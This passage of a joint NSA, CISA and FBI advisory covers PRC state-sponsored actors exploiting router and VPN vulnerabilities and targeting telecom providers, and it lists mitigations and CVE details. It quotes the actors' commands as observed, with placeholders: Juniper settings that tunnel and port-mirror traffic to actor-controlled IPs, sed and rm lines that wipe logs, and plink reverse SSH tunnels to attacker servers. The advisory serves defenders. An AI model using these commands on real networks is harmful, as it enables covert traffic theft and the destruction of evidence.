private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/china>) webpage.\n\n[Click here](<https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF>) for PDF.\n\n### Common vulnerabilities exploited by People\u2019s Republic of China state-sponsored cyber actors\n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.\n\nSince 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [[T1133](<https://attack.mitre.org/techniques/T1133/>)] or public facing applications [[T1190](<https://attack.mitre.org/techniques/T1190/>)]\u2014without using their own distinctive or identifying malware\u2014so long as the actors acted before victim organizations updated their systems. \n\nPRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.\n\nThese cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders\u2019 accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.\n\nNSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.\n\n_**Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors**_\n\nVendor CVE Vulnerability Type \n--- \nCisco | CVE-2018-0171 | Remote Code Execution \nCVE-2019-15271 | RCE \nCVE-2019-1652 | RCE \nCitrix | CVE-2019-19781 | RCE \nDrayTek | CVE-2020-8515 | RCE \nD-Link | CVE-2019-16920 | RCE \nFortinet | CVE-2018-13382 | Authentication Bypass \nMikroTik | CVE-2018-14847 | Authentication Bypass \nNetgear | CVE-2017-6862 | RCE \nPulse | CVE-2019-11510 | Authentication Bypass \nCVE-2021-22893 | RCE \nQNAP | CVE-2019-7192 | Privilege Elevation \nCVE-2019-7193 | Remote Inject \nCVE-2019-7194 | XML Routing Detour Attack \nCVE-2019-7195 | XML Routing Detour Attack \nZyxel | CVE-2020-29583 | Authentication Bypass \n \n### Telecommunications and network service provider targeting\n\nPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [[T1595.002](<https://attack.mitre.org/techniques/T1595/002/>)], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.\n\nUpon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [[T1078](<https://attack.mitre.org/techniques/T1078/>)] and utilized SQL commands to dump the credentials [[T1555](<https://attack.mitre.org/techniques/T1555/>)], which contained both cleartext and hashed passwords for user and administrative accounts. \n\nHaving gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [[T1119](<https://attack.mitre.org/techniques/T1119/>)]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor\u2019s infrastructure [[TA0010](<https://attack.mitre.org/tactics/TA0010/>)]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.\n\nArmed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [[T1599](<https://attack.mitre.org/techniques/T1599/>)], capture [[T1020.001](<https://attack.mitre.org/techniques/T1020/001/>)], and exfiltrate traffic out of the network to actor-controlled infrastructure. \n\nWhile other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:\n\nset chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value> \nset chassis network-services all-ethernet \nset interfaces <interface-id> unit <unit number> tunnel source <local network IP address> \nset interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address> \n\n\nAfter establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.\n\nset interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet> \nset routing-options static route <local network IP address> next-hop <actor controlled IP address> \n\n\nPRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. \n\nset firewall family inet filter <filter name> term <filter variable> then port-mirror \nset forwarding-options port-mirroring input rate 1 \nset forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address> \nset forwarding-options port-mirroring family inet output no-filter-check \nset interfaces <interface-id> unit <unit number> family inet filter input <filter name> \nset interfaces <interface-id> unit <unit number> family inet filter output <filter name> \n\n\nHaving completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.\n\nsed -i -e '/<REGEX>/d' <log filepath 1> \nsed -i -e '/<REGEX>/d' <log filepath 2> \nsed -i -e '/<REGEX>/d' <log filepath 3> \nrm -f <log filepath 4> \nrm -f <log filepath 5> \nrm -f <log filepath 6> \n\n\nPRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [[T1572](<https://attack.mitre.org/techniques/T1572/>)] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [[T1016.001](<https://attack.mitre.org/techniques/T1016/001/>)] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.\n\nplink.exe \u2013N \u2013R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port> \nplink.exe \u2013N \u2013R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port> \n\n\n### Mitigations\n\nNSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:\n\n * Keep systems and products updated and patched as soon as possible after patches are released [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/>)] . Consider leveraging a centralized patch management system to automate and expedite the process.\n * Immediately remove or isolate suspected compromised devices from the network [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)].\n * Segment networks to limit or block lateral movement [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation>)]. \n * Disable unused or unnecessary network services, ports, protocols, and devices [[D3-ACH](<https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/>)] [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)]. \n * Enforce multifactor authentication (MFA) for all users, without exception [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. \n * Enforce MFA on all VPN connections [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. If MFA is unavailable, enforce password complexity requirements [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)]. \n * Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)].\n * Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. \n * Disable external management capabilities and set up an out-of-band management network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [[D3-NTA](<https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/>)] [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)].\n * Ensure that you have dedicated management systems [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening/>)] and accounts for system administrators. Protect these accounts with strict network policies [[D3-UAP](<https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/>)].\n * Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)]. \n * Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and <https://www.nsa.gov/cybersecurity-guidance> for previous reporting on People\u2019s Republic of China state-sponsored malicious cyber activity.\n\nU.S. government and critical infrastructure organizations, should consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats.\n\nU.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including [Protective Domain Name System](<https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/PDNS/>) (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email [dib_defense@cyber.nsa.gov](<http://www.fbi.gov/contact-us/field>).\n\n### Additional References\n\n * CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. <https://www.cisa.gov/uscert/ncas/alerts/aa22-137a>\n * CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>\n * NSA (2021), Selecting and Hardening Remote Access VPN Solutions. <https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>\n * NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. <https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>\n * CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa21-110a>\n * NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n * CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. [https://www.cisa.gov/uscert/ncas/alerts/aa20-258a ](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n * NSA (2020), Performing Out-of-Band Network Management. <https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF>\n * CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. <https://www.cisa.gov/uscert/ncas/alerts/aa20-020a>\n * NSA (2019), Mitigating Recent VPN Vulnerabilities. <https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>\n * NSA (2019), Update and Upgrade Software Immediately. <https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>\n\n### Contact Information \n\nTo report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at [report@cisa.gov](<mailto:report@cisa.gov>). To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch at 855-292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). \n\nMedia Inquiries / Press Desk: \n\n * NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)\n * CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov ](<mailto:CISAMedia@cisa.dhs.gov>)\n * FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### _Disclaimer of endorsement_\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### _Purpose_\n\nThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \n\n### Appendix A: Vulnerabilities\n\n**_Table 2: Information on Cisco CVE-2018-0171_**\n\nCisco CVE-2018-0171 CVSS 3.0: 9.8 (Critical) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash. \n \n_**Recommended Mitigations **_\n\n * Cisco has released software updates that address this vulnerability.\n * In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure. \n_**Detection Methods**_\n\n * CISCO IOS Software Checker \n \n_**Vulnerable Technologies and Versions**_\n\nThe vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/103538> \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2> \n<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04> \n[https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05](<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04>) \n<https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490> \n<http://www.securitytracker.com/id/1040580> \n \n**_Table 3: Information on Cisco CVE-2019-15271_**\n\nCisco CVE-2019-15271 CVSS 3.0: 8.8 (High) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges. \n \n**_Recommended Mitigations _**\n\n * Cisco has released free software updates that address the vulnerability described in this advisory.\n * Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.\n * Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default. \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:\n\n * RV016 Multi-WAN VPN Router\n * RV042 Dual WAN VPN Router\n * RV042G Dual Gigabit WAN VPN Router\n * RV082 Dual WAN VPN Router \n \n_**References **_\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x> \n \n**_Table 4: Information on Cisco CVE-2019-1652_**\n\nCisco CVE-2019-1652 CVSS 3.0: 7.2 (High) \n--- \n \n_**Vulnerability Description **_\n\nA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability. \n \n_**Recommended Mitigations **_\n\n * Cisco has released free software updates that address the vulnerability described in this advisory\n * This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.\n * If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure. \n**_Detection Methods _**\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/106728> \n<https://seclists.org/bugtraq/2019/Mar/55> \n<https://www.exploit-db.com/exploits/46243/> \n<https://www.exploit-db.com/exploits/46655/> \n<http://seclists.org/fulldisclosure/2019/Mar/61> \n[http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html](<http:/
Postmortem on U.S. Census Hack Exposes Cybersecurity Failures
